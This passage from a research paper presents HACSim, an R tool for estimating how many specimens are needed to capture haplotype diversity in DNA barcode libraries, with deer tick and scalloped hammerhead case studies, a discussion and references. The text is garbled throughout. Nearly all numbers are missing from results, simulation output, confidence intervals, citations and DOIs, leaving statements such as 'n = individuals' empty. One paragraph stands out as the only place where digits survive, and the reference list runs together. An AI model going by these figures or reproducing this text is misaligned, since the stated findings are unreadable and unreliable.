ticks, particularly the hard-bodied ticks (arachnida: acari: ixodida: ixodidae), are well-known as vectors of various zoonotic diseases including lyme disease (ondrejicka et al., ). apart from this defining characteristic, the morphological identification of ticks at any life stage, by even expert taxonomists, is notoriously difficult or sometimes even impossible (ondrejicka, morey & hanner, ). further, the presence of likely high cryptic species diversity in this group means that turning to molecular techniques such as dna barcoding is often the only feasible option for reliable species diagnosis. lyme-competent specimens can be accurately detected by employing a sensitive quantitative pcr (qpcr) procedure (ondrejicka, morey & hanner, ). however, for such a workflow to be successful, wide coverage of within-species haplotype variation from across broad geographic ranges is paramount to better aid the design of primer and probe sets for rapid species discrimination. furthermore, the availability of large specimen sample sizes for tick species of medical and epidemiological relevance is necessary for accurately assessing the presence of the barcode gap.
notably, the deer tick (ixodes scapularis), native to canada and the united states, is the primary carrier of borrelia burgdorferi, the bacterium responsible for causing lyme disease in humans in these regions. because of this, i. scapularis has been the subject of intensive taxonomic study in recent years. for instance, in a recent dna barcoding study of medically-relevant canadian ticks, ondrejicka, morey & hanner ( ) found that out of eight specimens assessed for the presence of b. burgdorferi, % tested positive. however, as only exoskeletons and a single leg were examined for systemic infection, the reported infection rate may be a lower bound, given that examined specimens may still harbour b. burgdorferi in their gut. as such, this species is well-represented within bold and thus warrants further examination within the present study.
as of august , , ′-coi dna barcode sequences are accessible from bold's public data portal for this species. of these, n = met the criteria for high quality outlined in phillips et al. ( ). a bp muscle alignment comprised h* = unique haplotypes. haplotype analysis revealed that haplotypes – were represented by more than specimens (range: – ; fig. ).
simulation output of hacsim is depicted below.
### run simulations ###
> hacsobj <- hacreal()
> hac.simrep(hacsobj)
simulating haplotype accumulation...
|==========================================================| %
--- measures of sampling closeness ---
mean number of haplotypes sampled: .
mean number of haplotypes not sampled: .
proportion of haplotypes sampled: .
proportion of haplotypes not sampled: .
mean value of n*: .
mean number of specimens not sampled: .
desired level of haplotype recovery has not yet been reached
|==========================================================| %
--- measures of sampling closeness ---
mean number of haplotypes sampled: .
mean number of haplotypes not sampled: .
proportion of haplotypes sampled: .
proportion of haplotypes not sampled: .
mean value of n*: .
mean number of specimens not sampled: .
desired level of haplotype recovery has not yet been reached
|==========================================================| %
--- measures of sampling closeness ---
mean number of haplotypes sampled: .
mean number of haplotypes not sampled: .
proportion of haplotypes sampled: .
proportion of haplotypes not sampled: .
mean value of n*: .
mean number of specimens not sampled: .
desired level of haplotype recovery has been reached
---------- finished. ----------
the initial guess for sampling sufficiency was n = individuals
the algorithm converged after iterations and took . s
the estimate of sampling sufficiency for p = % haplotype recovery is n* = individuals ( % ci: . - . )
the number of additional specimens required to be sampled for p = % haplotype recovery is n* - n = individuals
figure : initial haplotype frequency distribution for n = high-quality deer tick (ixodes scapularis) coi barcode sequences obtained from bold. in this species, haplotypes – account for c. . % ( / ) of all sampled records.
figure : initial graphical output of hac.sim() for a real species (deer tick, i. scapularis) having eight dominant haplotypes. in this example, initially, only r = . % of the h* = estimated haplotypes for this species have been recovered based on a sample size of n = specimens. the haplotype frequency barplot is identical to that of fig. .
the above results clearly demonstrate the need for increased specimen sample sizes in deer ticks. with an initial sample size of n = individuals, only . % of all observed haplotypes are recovered for this species (fig. ). n* = specimens ( % ci: . – . ) are necessary to capture at least % of standing haplotype variation for i. scapularis (fig. ). thus, a further n* − n = specimens are required to be collected.
figure : final graphical output of hac.sim() for deer tick (i. scapularis) having eight dominant haplotypes. upon convergence, r = . % of the h* = estimated haplotypes for this species have been uncovered with a sample size of n = specimens.
scalloped hammerhead (sphyrna lewini)
sharks (chondrichthyes: elasmobranchii: selachimorpha) represent one of the most ancient extant lineages of fishes.
despite this, many shark species face immediate extinction as a result of overexploitation, together with a unique life history (e.g., k-selected, predominant viviparity, long gestation period, lengthy time to maturation) and migration behaviour (hanner, naaum & shivji, ). a large part of the problem stems from the increasing consumer demand for, and illegal trade of, shark fins, meat and bycatch on the asian market. the widespread, albeit lucrative, practice of ''finning'', whereby live sharks are de-finned and immediately released, has led to the rapid decline of once stable populations (steinke et al., ). as a result, numerous shark species are currently listed by the international union for the conservation of nature (iucn) and the convention on international trade in endangered species of wild fauna and flora (cites).
interest in the molecular identification of sharks through dna barcoding is multifold. the coi reference sequence library for this group remains largely incomplete. further, many shark species exhibit high intraspecific distances within their barcodes, suggesting the possibility of cryptic species diversity. instances of hybridization between sympatric species have also been documented. as establishing species-level matches to partial specimens through morphology alone is difficult, and such a task becomes impossible once fins are processed and sold for consumption or use in traditional medicine, dna barcoding has paved a clear path forward for unequivocal diagnosis in most cases.
the endangered hammerheads (family: sphyrnidae) represent one of the most well-sampled groups of sharks within bold to date. fins of the scalloped hammerhead (sphyrna lewini) are especially highly prized within iuu (illegal, unregulated, unreported) fisheries due to their inclusion as the main ingredient in shark fin soup. as of august , , s. lewini specimens (sequenced at both barcode and non-barcode markers), collected from several food and agriculture organization (fao) regions, including the united states, are available through bold's public data portal. of these, all high-quality records (n = ) were selected for alignment in mega and assessment via hacsim. the final alignment was found to comprise h* = unique haplotypes, of which three were represented by or more specimens (range: – ; fig. ). hacsim results are displayed below.
### run simulations ###
> hacsobj <- hacreal()
> hac.simrep(hacsobj)
simulating haplotype accumulation...
|==========================================================| %
--- measures of sampling closeness ---
mean number of haplotypes sampled: .
mean number of haplotypes not sampled: .
proportion of haplotypes sampled: .
proportion of haplotypes not sampled: .
mean value of n*: .
mean number of specimens not sampled: .
desired level of haplotype recovery has not yet been reached
|==========================================================| %
--- measures of sampling closeness ---
mean number of haplotypes sampled: .
mean number of haplotypes not sampled: .
proportion of haplotypes sampled: .
proportion of haplotypes not sampled: .
mean value of n*: .
mean number of specimens not sampled: .
desired level of haplotype recovery has not yet been reached
|==========================================================| %
--- measures of sampling closeness ---
mean number of haplotypes sampled: .
mean number of haplotypes not sampled: .
proportion of haplotypes sampled: .
proportion of haplotypes not sampled: .
mean value of n*: .
mean number of specimens not sampled: .
desired level of haplotype recovery has been reached
---------- finished. ----------
the initial guess for sampling sufficiency was n = individuals
the algorithm converged after iterations and took . s
the estimate of sampling sufficiency for p = % haplotype recovery is n* = individuals ( % ci: . - . )
the number of additional specimens required to be sampled for p = % haplotype recovery is n* - n = individuals
figure : initial haplotype frequency distribution for n = high-quality scalloped hammerhead (sphyrna lewini) coi barcode sequences obtained from bold. in this species, haplotypes – account for c. . % ( / ) of all sampled records.
figure : initial graphical output of hac.sim() for a real species (scalloped hammerhead, s. lewini) having three dominant haplotypes. in this example, initially, only r = . % of the h* = estimated haplotypes for this species have been recovered based on a sample size of n = specimens. the haplotype frequency barplot is identical to that of fig. .
simulation output suggests that only . % of all unique haplotypes for the scalloped hammerhead have likely been recovered (fig. ) with a sample size of n = . further, hacsim predicts that n* = individuals ( % ci [ . – . ]) probably need to be randomly sampled to capture the majority of intraspecific genetic diversity within ′-coi (fig. ). since specimens have already been collected, this leaves an additional n* − n = individuals which await sampling.
figure : final graphical output of hac.sim() for scalloped hammerhead (s. lewini) having three dominant haplotypes. upon convergence, r = . % of the h* = estimated haplotypes for this species have been uncovered with a sample size of n = specimens.
discussion
initializing hacsim and overall algorithm behaviour
the overall stochastic behaviour of hacsim is highly dependent on the number of permutations used upon algorithm initialization. provided that the value assigned to the perms argument is set high enough, numerical results outputted by hacsim will be quite consistent between consecutive runs whenever all remaining parameter values are unchanged. it is crucial that perms not be set too low, in order to prevent the algorithm from getting stuck at local maxima and returning suboptimal solutions; this is a common situation with popular optimization algorithms such as hill-climbing. attention must therefore be paid to avoid making generalizations based on algorithm performance and obtained simulation results (spall, ). in applying the present method to simulated species data, it is important that selected simulation parameters are adequately reflective of those observed for real species. thus, initial sample sizes should be chosen to cover a wide range of values based on those currently observed within bold. such information can be gauged by examining species lists associated with bold records, which are readily accessible through linnean search queries within the taxonomy browser.
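the defaults quoted earlier (perms and p) can be overridden when a scenario is initialized. the call below is a hedged illustration of doing so: it assumes, based on table and the defaults reported above, that both arguments are exposed through the helper functions, and the particular values shown are arbitrary example choices rather than recommendations.

> # example values only: a larger perms stabilizes the mean accumulation curve,
> # while p sets the target level of haplotype recovery
> hacsobj <- hachypothetical(n = n, hstar = hstar, probs = probs, perms = 10000, p = 0.95)
> hac.simrep(hacsobj)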
as with any iterative numerical algorithm, selecting good starting guesses for initialization is key. while hacsim is globally convergent (i.e., convergence is guaranteed for any value of n ≥ h*), a good strategy when simulating hypothetical species is to start the algorithm by setting n = h*. in this way, the observed fraction of haplotypes found, r, will not exceed the desired level of haplotype recovery p, and therefore will not lead to overestimation of likely required specimen sample sizes. setting n high enough will almost surely result in r exceeding p; thus, arbitrarily large values of n may not be biologically meaningful or practical. however, in the case of hypothetical species simulation, should initial sample sizes be set too high, such that r > p, a straightforward workaround is to observe where the dashed horizontal line intersects the final haplotype accumulation curve (i.e., not the line that touches the curve endpoint). the resulting value of n at this point will correspond with p quite closely. this can be seen in fig. , where an eyeball guess just over n* = individuals is necessary to recover p = % haplotype variation. a more reliable estimate can be obtained by examining the dataframe ''d'' outputted once the algorithm has halted (via envr$d). in this situation, simply look in the first row for which the mean number of haplotypes accumulated is at least ph*. the required sample size is the value given in the first column (specs). this is accomplished via the r code envr$d[which(envr$d$means >= envr$p * envr$hstar), ][ , ].
the novelty of hacsim is that it offers a systematic means of estimating likely specimen sample sizes required to assess intraspecific haplotype diversity for taxa within large-scale genomic databases like genbank and bold. estimates of sufficient sampling suggested by our algorithm can be employed to assess barcode coverage within existing reference sequence libraries and campaign projects found in bold. while comparison of our method to already-established ones is not yet possible, we anticipate that hacsim will nevertheless provide regulatory applications with an unprecedented view and greater understanding of the state of standing genetic diversity (or lack thereof) within species.
additional capabilities and extending functionality of hacsim
in this paper, we illustrate the application of haplotype accumulation curves to the broad assessment of species-level genetic variation. however, hacsim is quite flexible in that one can easily explore likely required sample sizes at higher taxonomic levels (e.g., order, family, genus) or for specific geographic regions (e.g., salmonids of the great lakes). such applicability will undoubtedly be of interest at larger scales (i.e., entire genomic sequence libraries). for instance, due to evidence of sampling bias in otherwise densely-sampled taxa housed in bold (e.g., lepidoptera), d'ercole et al. (j. d'ercole, , unpublished data) wished to assess whether or not intraspecific haplotype variation within butterfly species remains unsampled. to test this, the authors employed hacsim to examine sampling comprehensiveness for species comprising a large barcode reference library for north american butterflies spanning species and , specimens. we foresee use of hacsim being widespread within the dna barcoding community.
as such, the outlook for improvements to existing code in terms of further optimization and algorithm runtime, as well as for the implementation of new methods by experienced r programmers in the space of dna-based taxonomic identification, seems bright. potential extensions of our algorithm include support for the exploration of genetic variation at the barcode index number (bin) level (ratnasingham & hebert, ), as well as high-throughput sequencing (hts) data for metabarcoding and environmental dna (edna) applications. such capabilities are likely to be challenging to implement at this stage until robust operational taxonomic unit (otu) clustering algorithms are developed (preferably in r). one promising tool in this regard for barcoding of bulk samples of real species and mock communities of known species composition is jamp (just another metabarcoding pipeline), devised for use in r by elbrecht and colleagues (elbrecht et al., ). jamp includes a sequence read denoising tool that can be used to obtain haplotype numbers and frequency information (h* and probs). however, because jamp relies on third-party software (particularly usearch (edgar, ) and vsearch (rognes et al., )), it cannot be integrated within hacsim itself and will thus have to be used externally.
in extending hacsim to next-generation space, two issues arise. first, it is not immediately clear how the argument n is to be handled, since multiple reads could be associated with single individuals. that is, unlike in traditional sanger-based sequencing, there is not a one-to-one correspondence between specimen and sequence (wares & pappalardo, ; adams et al., ). second, obtaining reliable haplotype information from noisy hts datasets is challenging without first having strict quality filtering criteria in place to minimize the occurrence of rare, low-copy sequence variants, which may reflect artifacts stemming from the polymerase chain reaction (pcr) amplification step or the sequencing process (elbrecht et al., ; braukmann et al., ; turon et al., ). turning to molecular population genetics theory might be the answer (adams et al., ). wares & pappalardo ( ) suggest three different approaches to estimating the number of specimens of a species that may have contributed to a metabarcoding sample: ( ) use of prior estimates of haplotype diversity, together with the observed number of haplotypes; ( ) usage of ewens' sampling formula (ewens, ) along with estimates of watterson's θ (not to be confused with the θ denoting true sampling sufficiency herein) (watterson, ), as well as the total number of sampled haplotypes; and ( ) employment of an estimate of θ and the number of observed variable sites (s) within a multiple sequence alignment. a direct solution we propose might be to use sequencing coverage/depth (i.e., the number of sequence reads) as a proxy for the number of individuals. the outcome of this would be an estimate of the mean/total number of sequence reads required for maximal haplotype recovery. however, the use of read count as a stand-in for the number of specimens sampled would require the unrealistic assumption that all individuals (i.e., both alive and dead) shed dna into their environment at equal rates. the obvious issue with extending hacsim to handle hts data is computing power, as such data typically consist of millions of reads spanning multiple gigabytes of computer memory.
summary
here, we introduced a new statistical approach to assess specimen sampling depth within species based on existing gene marker variation found in public sequence databanks such as bold and genbank. hacsim is both computationally efficient and easy to use. we show the utility of our proposed algorithm using both hypothetical and real species genomic sequence data. for real species (here, lake whitefish, deer tick and scalloped hammerhead), results from hacsim suggest that comprehensive sampling for species comprising large barcode libraries within bold, such as actinopterygii, arachnida and elasmobranchii, is far from complete. with the availability of hacsim, appropriate sampling guidelines based on the amount of potential error one is willing to tolerate can now be established. for the purpose of addressing basic questions in biodiversity science, the employment of small taxon sample sizes may be adequate; however, this is not the case for regulatory applications, where greater than % coverage of intraspecific haplotype variation is needed to provide high confidence in sequence matches defensible in a court of law.
of immediate interest is the application of our method to other ray-finned fishes, as well as to other species from deeply inventoried taxonomic groups such as elasmobranchii (e.g., sharks), insecta (e.g., lepidoptera, culicidae (mosquitoes)), arachnida (e.g., ticks) and chiroptera (bats) that are of high conservation, medical and/or socioeconomic importance. although we explicitly demonstrate the use of hacsim employing coi, it would be interesting to extend usage to other barcode markers such as the ribulose-1,5-bisphosphate carboxylase/oxygenase large subunit (rbcl) and maturase k (matk) chloroplast genes for land plants, as well as the nuclear internal transcribed spacer (its) marker regions for fungi. the application of our method to non-barcode genes routinely employed in specimen identification, like mitochondrial cytochrome b (cytb) in birds for instance (baker, sendra tavares & elbourne, ; lavinia et al., ), nuclear rhodopsin (rho) for marine fishes (hanner et al., ) or the phosphoenolpyruvate carboxykinase (pepck) nuclear gene for bumblebees (williams et al., ), is also likely to yield interesting results, since sequencing numerous individuals at several different genomic markers can often reveal evolutionary patterns not otherwise seen from employing a single-gene approach (e.g., resolution of cryptic species or confirmation/revision of established taxonomic placements) (williams et al., ). while it is reasonable that hacsim can be applied to genomic regions besides ′-coi, careful consideration of varying rates of molecular evolution within rapidly-evolving gene markers, and of the effect on downstream inferences, is paramount, as is sequence quality. previous work in plants (genus: taxus) by liu et al. ( ) found evidence of a correlation between mutation rate and required specimen sampling depth: genes evolving at faster rates will likely require larger sample sizes to estimate haplotype diversity compared to slowly-evolving genomic loci. we focused on ′-coi simply because it is by far the most widely sequenced mitochondrial locus for specimen identification, owing to its desirable biological properties as a dna barcode for animal taxa and because it has an associated data standard to help filter out poor-quality data (phillips, gillis & hanner, ).
however, it should be noted that species diagnosis using coi and other barcode markers is not without its challenges. while coi accumulates variation at an appreciable rate, certain taxonomic groups are not readily distinguished on the basis of their dna barcodes (e.g., the so-called ''problem children'', such as cnidaria, which tend to lack adequate sequence divergence (bucklin, steinke & blanco-bercial, )). other taxa, like mollusca, are known to harbour indel mutations (layton, martel & hebert, ). introns within fungi greatly complicate sequence alignment (min & hickey, ). thus, users of hacsim must exercise caution in interpreting end results with other markers, particularly those which are not protein-coding.
it is necessary to consider the importance of sampling sufficiency as it pertains to the myriad regulatory applications of specimen identification established using dna barcoding (e.g., combatting food fraud) in recent years. it has since become apparent that the success of such endeavours is complicated by the ever-evolving state of public reference sequence libraries such as those found within bold, in addition to the inclusion of questionable sequences and the lack of sufficient metadata for validation purposes in other genomic databases like genbank (e.g., harris ( )). dynamic dna-based identification systems may produce multiple conflicting hits to otherwise corresponding submissions over time. this unwanted behaviour has led a number of regulatory agencies to create their own static repositories populated with expertly-identified sequence records tied to known voucher specimens deemed fit-for-purpose for molecular species diagnosis and forensic compliance (e.g., the united states food and drug administration (usfda)'s reference standard sequence library (rssl), employed to identify unknown seafood samples from species of high socioeconomic value). while such a move has partially solved the problem of dynamism inherent in global sequence databases, there still remains the issue of low sample sizes, which can greatly inflate the perception of barcode gaps between species. obtaining adequate representation of standing genetic variation, both within and between species, is therefore essential to mitigating false assignments using dna barcodes. to this end, we propose the use of hacsim to assess the degree of saturation of haplotype accumulation curves, to aid regulatory scientists in rapidly and reliably projecting likely sufficient specimen sample sizes required for accurate matching of unknown queries to known linnean names. a defining characteristic of hacsim is its convergence behaviour: the method converges to the desired level of haplotype recovery p for any initial guess n specified by the user. based on the examples explored herein, it appears likely that already-sampled species within repositories like bold are far from being fully characterized on the basis of existing haplotype variation.
in addition to this, it is important to consider the current limitations of our algorithm. we can think of only one: it must be stressed that appropriate sample size trajectories are not possible for species with only single representatives within public dna sequence databases, because haplotype accumulation is unachievable with only one dna sequence and/or a single sampled haplotype. hence, hacsim can only be applied to species with at least two sampled specimens.
thus, application of our method to assess necessary sample sizes for full capture of extant haplotype variation in exceedingly rare or highly elusive taxa is not feasible. despite this, we feel that hacsim can greatly aid in the accurate and rapid barcode library construction necessary to thoroughly appreciate the diversity of life on earth.
conclusions
herein, a new, easy-to-use r package was presented that can be employed to estimate intraspecific sample sizes for studies of genetic diversity assessment, with a particular focus on animal dna barcoding using the coi gene. hacsim employs a novel nonparametric stochastic iterative extrapolation algorithm with good convergence properties to generate haplotype accumulation curves. because our approach treats species' haplotypes as numeric labels, any genomic locus can be targeted to probe levels of standing genetic variation within multicellular taxa. however, we stress that users must exercise care when dealing with sequence data from non-coding regions of the genome, since these are likely to comprise sequence artifacts such as indels and introns, which can both hinder successful sequence alignment and lead to overestimation of existing haplotype variation within species. the application of our method to assess likely required sample sizes for both hypothetical and real species produced promising results. we argue that the use of hacsim will be of broad interest in both academic and industry settings, most notably to regulatory agencies such as the canadian food inspection agency (cfia), agriculture and agri-food canada (aafc), the united states department of agriculture (usda), the public health agency of canada (phac) and the usfda. while hacsim is an ideal tool for the analysis of sanger sequencing reads, an obvious next step is to extend usability to next-generation sequencing (ngs), especially hts applications. with these elements in place, even the full integration of hacsim to assess the comprehensiveness of taxon sampling within large sequence databases such as bold seems like a reality in the near future.
acknowledgements
the authors wish to extend thanks to robert (rob) young for helpful discussions and providing critical feedback on an earlier draft of this manuscript that greatly improved its flow and overall readability. we acknowledge that the university of guelph resides on the ancestral lands of the attawandaron people and the treaty lands and territory of the mississaugas of the credit. we recognize the significance of the dish with one spoon covenant to this land and offer our respect to our anishinaabe, haudenosaunee and métis neighbours as we strive to strengthen our relationships with them.
additional information and declarations
funding
this work was supported by the college of physical and engineering science (cpes) graduate excellence entrance scholarship to jarrett d. phillips. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.
grant disclosures
the following grant information was disclosed by the authors: college of physical and engineering science (cpes) graduate excellence entrance scholarship.
competing interests
the authors declare there are no competing interests.
author contributions
• jarrett d. phillips conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
• steven h. french conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
• robert h. hanner and daniel j. gillis conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
data availability
the following information was supplied regarding data availability:
the aligned and trimmed dna barcodes are available at figshare:
phillips, jarrett ( ): coregonus clupeaformis ′-coi dna barcode sequences. figshare. dataset. . /m .figshare. .v .
phillips, jarrett ( ): ixodes scapularis ′-coi dna barcode sequences. figshare. dataset. . /m .figshare. .v .
phillips, jarrett ( ): sphyrna lewini ′-coi dna barcode sequences. figshare. dataset. . /m .figshare. .v .
a stable version of the algorithm is available on github: https://github.com/jphill /hacsim.r, along with a detailed readme on how to run the code.
supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.
references
adams c, knapp m, gemmell n, jeunen g-j, bunce m, lamare m, taylor h. . beyond biodiversity: can environmental dna (edna) cut it as a population genetics tool? genes ( ): – doi . /genes .
april j, hanner rh, dion-côté a-m, bernatchez l. a. glacial cycles as an allopatric speciation pump in north-eastern american freshwater fishes. molecular ecology ( ): – doi . /mec. .
april j, hanner rh, mayden rl, bernatchez l. b. metabolic rate and climatic fluctuations shape continental wide pattern of genetic divergence and biodiversity in fishes. plos one ( ):e doi . /journal.pone. .
april j, mayden rl, hanner rh, bernatchez l. . genetic calibration of species diversity among north america's freshwater fishes. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. .
baker a, sendra tavares e, elbourne r. . countering criticisms of single mitochondrial dna gene barcoding in birds. molecular ecology resources (s ): – doi . /j. - . . .x.
bergsten j, bilton dt, fujisawa t, elliott m, monaghan mt, balke m, hendrich l, geijer j, herrmann j, foster gn, i r, nilsson a, barraclough t, vogler a. . the effect of geographical scale of sampling on dna barcoding. systematic biology ( ): – .
braukmann t, ivanova n, prosser s, elbrecht v, steinke d, ratnasingham s, de waard j, sones j, zakharov e, hebert p. . metabarcoding a diverse arthropod mock community. molecular ecology resources ( ): – .
brown sd, collins ra, boyer s, lefort m-c, malumbres-olarte j, vink cj, cruickshank rh. . spider: an r package for the analysis of species identity and evolution, with particular reference to dna barcoding. molecular ecology resources ( ): – doi . /j. - . . .x.
bucklin a, steinke d, blanco-bercial l. . dna barcoding of marine metazoa. annual review of marine science : – doi . /annurev-marine- - .
cameron s, rubinoff d, will k. . who will actually use dna barcoding and what will it cost? systematic biology ( ): – doi . / .
Čandek k, kuntner m. . dna barcoding gap: reliable species identification over morphological and geographical scales. molecular ecology resources ( ): – doi . / - . .
casella g, berger r. . statistical inference. california: duxbury thomson learning.
ceballos g, ehrlich pr, barnosky ad, garcía a, pringle rm, palmer tm. . accelerated modern human–induced species losses: entering the sixth mass extinction. science advances ( ):e doi . /sciadv. .
chao a. . nonparametric estimation of the number of classes in a population. scandinavian journal of statistics : – .
collins r, cruickshank r. . the seven deadly sins of dna barcoding. molecular ecology resources ( ): – doi . / - . .
dasmahapatra kk, elias m, hill ri, hoffman ji, mallet j. . mitochondrial dna barcoding detects some species that are real, and some that are not. molecular ecology resources ( ): – doi . /j. - . . .x.
eddelbuettel d, françois r. . rcpp: seamless r and c++ integration. journal of statistical software ( ): – doi . /jss.v .i .
eddelbuettel d, sanderson c. . rcpparmadillo: accelerating r with high-performance c++ linear algebra. computational statistics and data analysis : – doi . /j.csda. . . .
edgar rc. . search and clustering orders of magnitude faster than blast. bioinformatics ( ): – doi . /bioinformatics/btq .
efron b. . bootstrap methods: another look at the jackknife. the annals of statistics ( ): – .
elbrecht v, vamos ee, steinke d, leese f. . estimating intraspecific genetic diversity from community dna metabarcoding data. peerj :e doi . /peerj. .
ewens wj. . the sampling theory of selectively neutral alleles. theoretical population biology ( ): – doi . / - ( ) - .
ezard t, fujisawa t, barraclough t. . splits: species' limits by threshold statistics. r package version . - /r . available at https://r-forge.r-project.org/projects/splits/.
fujisawa t, barraclough t. . delimiting species using single-locus data and the generalized mixed yule coalescent approach: a revised method and evaluation on simulated data sets. systematic biology ( ): – doi . /sysbio/syt .
goodall-copestake w, tarling g, murphy e. . on the comparison of population-level estimates of haplotype and nucleotide diversity: a case study using the gene cox in animals. heredity ( ): – doi . /hdy. . .
gwiazdowski ra, elkinton js, dewaard jr, sremac m. . phylogeographic diversity of the winter moths operophtera brumata and o. bruceata (lepidoptera: geometridae) in europe and north america. annals of the entomological society of america ( ): – doi . /an .
hanner r. . data standards for barcode records in insdc (bris). university of guelph.
hanner r, floyd r, bernard a, collette bb, shivji m. . dna barcoding of billfishes. mitochondrial dna (sup ): – doi . / . . .
hanner rh, naaum am, shivji ms. . conclusion: dna-based authentication of shark products and implications for conservation and management. in: naaum am, hanner rh, eds. seafood authenticity and traceability: a dna-based perspective. st edition. california, massachusetts, oxford: academic press.
harris dj. . can you bank on genbank? trends in ecology & evolution ( ): – doi . /s - ( ) - .
hebert pd, cywinska a, ball sl, dewaard j. . biological identifications through dna barcodes. proceedings of the royal society of london b: biological sciences ( ): – doi . /rspb. . .
hebert pd, ratnasingham s, de waard jr. . barcoding animal life: cytochrome c oxidase subunit divergences among closely related species. proceedings of the royal society of london b: biological sciences (suppl ):s –s .
hebert pd, stoeckle my, zemlak ts, francis cm. . identification of birds through dna barcodes. plos biology ( ):e doi . /journal.pbio. .
hickerson mj, meyer cp, moritz c. . dna barcoding will often fail to discover new animal species over broad parameter space. systematic biology ( ): – doi . / .
hubert n, hanner r, holm e, mandrak ne, taylor e, burridge m, watkinson d, dumont p, curry a, bentzen p, zhang j, april j, bernatchez l. . identifying canadian freshwater fishes through dna barcodes. plos one ( ):e doi . /journal.pone. .
jin q, he l-j, zhang a-b. . a simple d non-parametric resampling statistical approach to assess confidence in species identification in dna barcoding—an alternative to likelihood and bayesian approaches. plos one ( ):e doi . /journal.pone. .
kimura m, weiss g. . the stepping stone model of population structure and the decrease of genetic correlation with distance. genetics ( ): – .
kumar s, stecher g, tamura k. . mega : molecular evolutionary genetics analysis version . for bigger datasets. molecular biology and evolution ( ): – .
lavinia p, kerr k, tubaro p, hebert p, lijtmaer d. . calibrating the molecular clock beyond cytochrome b: assessing the evolutionary rate of coi in birds. journal of avian biology ( ): – doi . /jav. .
layton k, martel a, hebert p. . patterns of dna barcode variation in canadian marine molluscs. plos one ( ):e doi . /journal.pone. .
liu j, provan j, gao l-m, li d-z. . sampling strategy and potential utility of indels for dna barcoding of closely related plant species: a case study in taxus. international journal of molecular sciences ( ): – doi . /ijms .
luo a, lan h, ling c, zhang a-b, shi l, ho sy, zhu c. . a simulation study of sample size for dna barcoding. ecology and evolution ( ): – doi . /ece . .
matz mv, nielsen r. . a likelihood ratio test for species membership based on dna sequence data. philosophical transactions of the royal society of london b: biological sciences ( ): – doi . /rstb. . .
meyer cp, paulay g. . dna barcoding: error rates based on comprehensive sampling. plos biology ( ):e doi . /journal.pbio. .
min x, hickey d. . assessing the effect of varying sequence length on dna barcoding of fungi. molecular ecology notes : – doi . /j. - . . .x.
monaghan m, wild r, elliot m, fujisawa t, balke m, inward d, lees d, ranaivosolo r, eggleton p, barraclough t, vogler a. . accelerated species inventory on madagascar using coalescent-based models of species delineation. systematic biology ( ): – doi . /sysbio/syp .
nielsen r, matz m. . statistical approaches for dna barcoding. systematic biology ( ): – doi . / .
ondrejicka da, locke sa, morey k, borisenko av, hanner rh. . status and prospects of dna barcoding in medically important parasites and vectors. trends in parasitology ( ): – doi . /j.pt. . . .
ondrejicka da, morey k, hanner rh. . dna barcodes identify medically important tick species in canada. genome ( ): – doi . /gen- - .
overdyk lm, braid he, crawford ss, hanner rh. . extending dna barcoding coverage for lake whitefish (coregonus clupeaformis) across the three major basins of lake huron. dna barcodes ( ): – .
paradis e. . pegas: an r package for population genetics with an integrated—modular approach. bioinformatics ( ): – doi . /bioinformatics/btp .
paradis e, claude j, strimmer k. . ape: analyses of phylogenetics and evolution in r language. bioinformatics ( ): – doi . /bioinformatics/btg .
pearson k. . contributions to the mathematical theory of evolution. philosophical transactions of the royal society of london a : – doi . /rsta. . .
phillips jd, gillis dj, hanner rh. . incomplete estimates of genetic diversity within species: implications for dna barcoding. ecology and evolution ( ): – doi . /ece . .
phillips jd, gwiazdowski ra, ashlock d, hanner r. . an exploration of sufficient sampling effort to describe intraspecific dna barcode haplotype diversity: examples from the ray-finned fishes (chordata: actinopterygii). dna barcodes ( ): – .
pons j, barraclough t, gomez-zurita j, cardoso a, duran d, hazell s, kamoun s, sumlin w, vogler a. . sequence-based species delimitation for the dna taxonomy of undescribed insects. systematic biology ( ): – doi . / .
puillandre n, lambert a, brouillet s. . abgd, automatic barcode gap discovery for primary species delimitation. molecular ecology : – .
r core team. . r: a language and environment for statistical computing. vienna: r foundation for statistical computing. available at https://www.r-project.org/.
ratnasingham s, hebert pd. . bold: the barcode of life data system (http://www.barcodinglife.org). molecular ecology notes ( ): – doi . /j. - . . .x.
ratnasingham s, hebert pd. . a dna-based registry for all animal species: the barcode index number (bin) system. plos one ( ):e doi . /journal.pone. .
rognes t, flouri t, nichols b, quince c, mahé f. . vsearch: a versatile open source tool for metagenomics. peerj :e doi . /peerj. .
ross ha, murugan s, li wls. . testing the reliability of genetic methods of species identification via simulation. systematic biology ( ): – doi . / .
testing the reliability of genetic methods of species identification via simulation. systematic biology ( ): – doi . / . ryan k, crawford s. . distribution and abundance of larval lake whitefish (core- gonus clupeaformis) in stokes bay, lake huron. journal of great lakes research : – doi . /j.jglr. . . . spall jc. . stochastic optimization. in: gentle je, härdle wk, mori y, eds. hand- book of computational statistics: concepts and methods. nd edition. heidelberg: springer. stein ed, martinez mc, stiles s, miller pe, zakharov ev. . is dna barcoding actually cheaper and faster than traditional morphological methods: results from a survey of freshwater bioassessment efforts in the united states plos one ( ):e doi . /journal.pone. . steinke d, bernard am, horn rl, hilton p, hanner r, shivji ms. . dna analysis of traded shark fins and mobulid gill plates reveals a high proportion of species of conservation concern. scientific reports ( ): – doi . /s - - -x. turon x, antich a, palacin c, præbel k, wangersteen o. . from metabarcoding to metaphylogeography: separating the wheat from the chaff. biorxiv. ward rd, zemlak ts, innes bh, last pr, hebert pd. . dna barcoding australia’s fish species. philosophical transactions of the royal society of london b: biological sciences ( ): – doi . /rstb. . . wares jp, pappalardo p. . can theory improve the scope of quantitative metazoan metabarcoding? diversity ( ): – doi . /d . watterson g. . on the number of segregating sites in genetical models without recombination. theoretical population biology ( ): – doi . / - ( ) - . wiemers m, fiedler k. . does the dna barcoding gap exist?—a case study in blue butterflies (lepidoptera: lycaenidae). frontiers in zoology ( ): – . phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / https://www.r-project.org/ http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj. http://dx.doi.org/ . / http://dx.doi.org/ . /j.jglr. . 